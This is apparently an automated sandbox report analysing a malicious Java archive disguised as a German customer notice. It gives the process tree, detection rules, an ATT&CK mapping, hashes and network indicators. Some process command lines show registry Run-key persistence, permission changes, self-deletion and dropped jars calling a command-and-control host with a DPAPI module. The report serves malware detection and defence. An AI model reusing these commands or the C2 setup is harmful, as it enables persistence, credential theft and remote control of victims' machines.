Windows
Analysis Report
Avisierung vom 03.04.2025 Kundennummer 1084472.jar
Overview
General Information
Detection
Score: | 84 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
7za.exe (PID: 7636 cmdline:
7za.exe x -y -oC:\ja r "C:\User s\user\Des ktop\Avisi erung vom 03.04.2025 Kundennum mer 108447 2.jar" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) conhost.exe (PID: 7648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
java.exe (PID: 7728 cmdline:
java.exe - jar "C:\Us ers\user\D esktop\Avi sierung vo m 03.04.20 25 Kundenn ummer 1084 472.jar" C XTKKfgE MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA) conhost.exe (PID: 7736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) icacls.exe (PID: 7816 cmdline:
C:\Windows \system32\ icacls.exe C:\Progra mData\Orac le\Java\.o racle_jre_ usage /gra nt "everyo ne":(OI)(C I)M MD5: 2E49585E4E08565F52090B144062F97E) conhost.exe (PID: 7824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) java.exe (PID: 5540 cmdline:
"C:\Progra m Files (x 86)\Java\j re-1.8\bin \java" -ja r C:\Users \user\AppD ata\Local\ Temp\7zgl6 mWD4hExxxj OoeVcv.jar jegjav.du ckdns.org 1967 "Avis ierung vom 03.04.202 5 Kundennu mmer 10844 72" 161.77 .13.2 "" MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA) conhost.exe (PID: 936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 5548 cmdline:
cmd /c reg add HKCU\ Software\M icrosoft\W indows\Cur rentVersio n\Run /v A visierung vom 03.04. 2025 Kunde nnummer 10 84472 /d " \"C:\Progr am Files ( x86)\Java\ jre-1.8\bi n\javaw\" -jar \"C:\ Users\user \AppData\R oaming\Avi sierung vo m 03.04.20 25 Kundenn ummer 1084 472.jar\"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 3496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) reg.exe (PID: 7448 cmdline:
reg add HK CU\Softwar e\Microsof t\Windows\ CurrentVer sion\Run / v Avisieru ng vom 03. 04.2025 Ku ndennummer 1084472 / d "\"C:\Pr ogram File s (x86)\Ja va\jre-1.8 \bin\javaw \" -jar \" C:\Users\u ser\AppDat a\Roaming\ Avisierung vom 03.04 .2025 Kund ennummer 1 084472.jar \"" MD5: CDD462E86EC0F20DE2A1D781928B1B0C) cmd.exe (PID: 5840 cmdline:
cmd /c pin g localhos t -n 6 > n ul && del "C:\Users\ user\AppDa ta\Local\T emp\7zgl6m WD4hExxxjO oeVcv.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 4768 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) PING.EXE (PID: 4692 cmdline:
ping local host -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12) java.exe (PID: 2964 cmdline:
"C:\Progra m Files (x 86)\Java\j re-1.8\bin \java" -ja r C:\Users \user\AppD ata\Local\ Temp\dpapi .jar jegja v.duckdns. org 1967 " Avisierung vom 03.04 .2025 Kund ennummer 1 084472" 16 1.77.13.2 dpapi|dpap i.jar MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA) conhost.exe (PID: 5900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) java.exe (PID: 4860 cmdline:
"C:\Progra m Files (x 86)\Java\j re-1.8\bin \java" -ja r C:\Users \user\AppD ata\Local\ Temp\Q80nz DuO6Y2mTZi 9wfDuL.jar jegjav.du ckdns.org 1967 "Avis ierung vom 03.04.202 5 Kundennu mmer 10844 72" 161.77 .13.2 off MD5: 9DAA53BAB2ECB33DC0D9CA51552701FA) conhost.exe (PID: 4328 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 5560 cmdline:
cmd /c pin g localhos t -n 6 > n ul && del "C:\Users\ user\AppDa ta\Local\T emp\Q80nzD uO6Y2mTZi9 wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 5816 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) PING.EXE (PID: 8000 cmdline:
ping local host -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12) cmd.exe (PID: 5868 cmdline:
cmd /c pin g localhos t -n 6 > n ul && del "C:\Users\ user\AppDa ta\Local\T emp\Q80nzD uO6Y2mTZi9 wfDuL.jar" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7448 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) PING.EXE (PID: 6892 cmdline:
ping local host -n 6 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
tool_paexec_strings | Detects PAExec based on strings | Sekoia.io |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
JoeSecurity_Allatori_JAR_Obfuscator | Yara detected Allatori_JAR_Obfuscator | Joe Security | ||
Click to see the 30 entries |
System Summary |
---|
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali: |
Persistence and Installation Behavior |
---|
Source: | Author: Joe Security: |
- • AV Detection
- • Compliance
- • Software Vulnerabilities
- • Networking
- • Key, Mouse, Clipboard, Microphone and Screen Capturing
- • System Summary
- • Data Obfuscation
- • Persistence and Installation Behavior
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
Click to jump to signature section
AV Detection |
---|
Source: | Neural Call Log Analysis: |
Source: | Binary string: |
Software Vulnerabilities |
---|
Source: | Process created: |
Source: | Code function: |
Networking |
---|
Source: | DNS query: |
Source: | Process created: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | DNS query: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: |
Source: | Code function: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Process created: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: | ||
Source: | Section loaded: |
Source: | Binary string: |
Data Obfuscation |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: | ||
Source: | Code function: |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Process created: |
Malware Analysis System Evasion |
---|
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | API coverage: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Memory protected: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: | ||
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 1 Masquerading | 21 Input Capture | 1 System Time Discovery | Remote Services | 21 Input Capture | 1 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 Services File Permissions Weakness | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 2 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Services File Permissions Weakness | 1 Disable or Modify Tools | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 112 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 11 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Services File Permissions Weakness | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | Virustotal | Browse | ||
11% | ReversingLabs | Binary.Trojan.Generic | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
0% | ReversingLabs | |||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
jegjav.duckdns.org | 128.90.145.126 | true | true | unknown | |
ip-api.com | 208.95.112.1 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false | |
128.90.145.126 | jegjav.duckdns.org | United States | 22363 | PHMGMT-AS1US | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1656232 |
Start date and time: | 2025-04-04 06:59:05 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 58s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | defaultwindowsfilecookbook.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Run name: | Without Tracing |
Number of analysed new started processes analysed: | 34 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | Avisierung vom 03.04.2025 Kundennummer 1084472.jar |
Detection: | MAL |
Classification: | mal84.troj.expl.evad.winJAR@36/25@5/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis
(whitelisted): MpCmdRun.exe, W MIADAP.exe, SIHClient.exe, Sgr mBroker.exe, conhost.exe, svch ost.exe - TCP Packets have been reduced
to 100 - Excluded IPs from analysis (wh
itelisted): 23.204.23.20, 204. 79.197.222, 4.245.163.56 - Excluded domains from analysis
(whitelisted): fp.msedge.net, fs.microsoft.com, slscr.updat e.microsoft.com, ctldl.windows update.com, c.pki.goog, fe3cr. delivery.mp.microsoft.com - Execution Graph export aborted
for target java.exe, PID 2964 because it is empty - Execution Graph export aborted
for target java.exe, PID 5540 because it is empty - Execution Graph export aborted
for target java.exe, PID 7728 because it is empty - Not all processes where analyz
ed, report is missing behavior information - Report size exceeded maximum c
apacity and may have missing b ehavior information. - Report size exceeded maximum c
apacity and may have missing n etwork information. - Report size getting too big, t
oo many NtSetInformationFile c alls found. - Report size getting too big, t
oo many NtWriteFile calls foun d.
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 52 |
Entropy (8bit): | 4.834679141051596 |
Encrypted: | false |
SSDEEP: | 3:oFj4I5vpm4USnxkLn:oJ5bnAn |
MD5: | 820A51136103187466669F3549214450 |
SHA1: | F1F6A6F179214713FC76DC87FE7689CDC7352AB2 |
SHA-256: | 70469350DB6EF612513EEF2E2B1E3A4248BBA2160EEFBBE18744AE837B7A297A |
SHA-512: | FEC2CFBD27F5506983CE5FA2EF2E1DF3C314751C28A682BE59DD51C8B0E0ED12E9163950675C23FB263DC9E3737E88DFB3F9D522AE5374C0EC2246AFDE1F92A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2796 |
Entropy (8bit): | 7.74055941239173 |
Encrypted: | false |
SSDEEP: | 48:9DtpMQU//Lm3Bec4NffvnGo1XVN1+w3iEYil/8qzQEr8njBeju6OOPtrFk8kUi1T:tIE3enGo1XV//3miZ0XMnVrq8CAUUEbV |
MD5: | A54F66492FD94668EF51A545D292F0B1 |
SHA1: | 5CA2E82ACD0E62C3C97FD9B16A27DA7FF88B68BA |
SHA-256: | BDC068FBF030308A87B3C9A7FEA487EF12B1DF34290D617CC4B103F1FD7E27C7 |
SHA-512: | 4916264091C45CD95E408EBBC7B08812479A4E77FD3A3036D95351E36516F8465A62089F20869DE89F4B69F9B15F159D27BDB894B4C657C0CAECE4436C64D496 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11108 |
Entropy (8bit): | 7.907426955263712 |
Encrypted: | false |
SSDEEP: | 192:7pawDRaWMYXGm263/+vsm1V9QObYWwevvJbmeU2uDYunhqBHr9t6rSVU1Ls5c5l8:7pawdaWXvWsm1EO8WPBmeUVk7Hrr6rSh |
MD5: | D0A0C0C43784CB4C27038A4A3E23F2BA |
SHA1: | 525C51436633938E49AB44BA9F2BAD9CEAF54C13 |
SHA-256: | DB2C3F5A4745E129B2E4FB90766C4893C7D93423C16A3360797845B77561176F |
SHA-512: | 22A0678ED068A7E3B846EE32CDC9FE6403D2330AEAFF11F68C7BBEAD5A86FB27BBAD5F65E8956FC5E1EB1964AB180270E552F568C85A96053207B5A184589D98 |
Malicious: | true |
Yara Hits: |
|
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2662 |
Entropy (8bit): | 7.74777446023506 |
Encrypted: | false |
SSDEEP: | 48:9XYe5NKxPuHiPLDgDK0DP7bLQbb+NSC0u4+jcefSHQ++P7qYZKppk6gc:r5kkuLyZn83fu44NZJP7jZKk6gc |
MD5: | 7FC5D32903CCFB588148C41481292EEA |
SHA1: | 098C980CB39F5DE6535D3E5339DEF97157DB8735 |
SHA-256: | DDFAFE23DB3BC32D6F53B255FDCE6A0A7815146D163D4C00A0F4A15EAFEF82FF |
SHA-512: | 43FA783F6A2783ECE97FF6337068C823DC0E75FDCD45988BE5C5656D72F5D3BF9FC95B79CE2D9AABCF8167F1EBED41A3559983B79F8B5827B41DFEF93CF69FFA |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.275778370270322 |
Encrypted: | false |
SSDEEP: | 96:wjPrtU8Gd8XomS6rnI28Ij/STLHG1bowmb:wju8Gd8XomS6oI+XHGd |
MD5: | 1B44B5CD529382D3702BF106E2C94D10 |
SHA1: | 6AA8BE28C7D09E731C3150473697A219A633067D |
SHA-256: | 397D951B3E851FDE2616F8A7DF6FEA2BD9E6396711507714B8515FA6243BD3BC |
SHA-512: | AE11B3D253ADBD904BBCF9633D790580FC24352CA53DC43362F4007A3A086B2EABA2AF7634058F8D0C7A585769FEC95E31BDF0BC8FB0D2E317879C538AD47401 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2802310005980957 |
Encrypted: | false |
SSDEEP: | 96:IpxrzX8GEZDYv655tq6rgTI28InaFSTgHG1bow75:IpJ8GgYva5tq6hIrEHGd |
MD5: | E2AAEF9EA57694E080487A163ED3D944 |
SHA1: | DC64DB92B36ED0AE772E0C540B94CF30C1A47C2A |
SHA-256: | E95CBCDF1248BFB7171E4BF4A4B8D9F249E12971DCDF95DEFBF2CCD5222ACF72 |
SHA-512: | 995AE34A48F5255C97A1AAEC37F2AAA31CA6157402E81A55594EB66A760D995EE0793C9FF191EA18304A9AB15358E3173B218A57F100848AF8D0A42BECA14F23 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2795675974819485 |
Encrypted: | false |
SSDEEP: | 96:ajPrCGs8GrSgqy0xY6rII28IO/STePHG1bowGZy:aj28Ge7y0xY6hIJQHGd |
MD5: | E9D97C416B7FB1CF248CA0612E06965E |
SHA1: | 605AFE3FA28E7E6555BC2659243820B661AF629D |
SHA-256: | 3C7F1B31E26C7E11CC321B6C5F9FEDA9E86E95C03FDA2C6063C359285F1E95A3 |
SHA-512: | E21FB30D692475ED785A7E8C7221801306A16FD4287D350D859AD80EBE92D2D38C853560E078774704E0F2AE96645DB3636C891AA9A96CE89C21B197A23654B1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 1.2962891498247433 |
Encrypted: | false |
SSDEEP: | 96:2Dor9c78GnqZQCOxtUkJdIoqu1oUl47TOaHG1bow+4cp:2DT8GnqZQC2nzITmoUGLHGdQ |
MD5: | 7A72874EE72073E2859F9BA44B12A38D |
SHA1: | B3543928B3F0378B5CA68D263ECDF817479BF1F6 |
SHA-256: | 37D304436B5C7F49763DD3D1F419E79CBAA7F1743A2D556EFAD80400DDD8931C |
SHA-512: | D90AB8D5B1820906C907B2002D272949AD35D13F6161D81A221667728AE36EC6E2FDBF006F3F9A9BD23C0DACA216F4D50126F3B66C8F6445DF997C6E3D6D07EB |
Malicious: | false |
Preview: |
Process: | C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1506993 |
Entropy (8bit): | 7.990710311197979 |
Encrypted: | true |
